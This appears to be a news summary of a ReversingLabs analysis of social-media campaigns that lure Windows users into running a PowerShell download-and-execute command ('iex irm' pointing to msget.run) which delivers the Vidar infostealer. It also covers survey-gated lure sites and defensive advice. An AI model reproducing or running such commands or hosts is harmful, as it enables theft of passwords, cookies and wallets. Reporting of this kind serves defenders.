Overview
- ReversingLabs, which published its analysis on Wednesday, June 10, confirmed a polished TikTok and Instagram tutorial that tells Windows users to open PowerShell and run a command (for example iex irm pointing to msget.run) that downloads a file identified as Vidar.
- A second campaign uses comment-baiting to trigger direct messages that route victims to survey-gated sites such as d4ug.site, but researchers could not pass the survey steps so the final payload from those links remains unverified.
- Vidar is sold as a malware-as-a-service on underground markets for about $300 and is designed to steal saved browser passwords, autofill data, cookies, cryptocurrency wallets, and authentication tokens.
- Attackers tune videos to game recommendation signals that reward saves and shares—one tracked clip logged roughly 109,000 views with thousands of saves—while platform reporting has failed to remove some accounts during the investigation.
- ReversingLabs urges defenders to audit who can install software, expand phishing training to include social feeds, and encourage reporting of suspicious posts because Vidar’s October 2025 stealth updates and common scripts that add Windows Defender exclusions make infections harder to detect.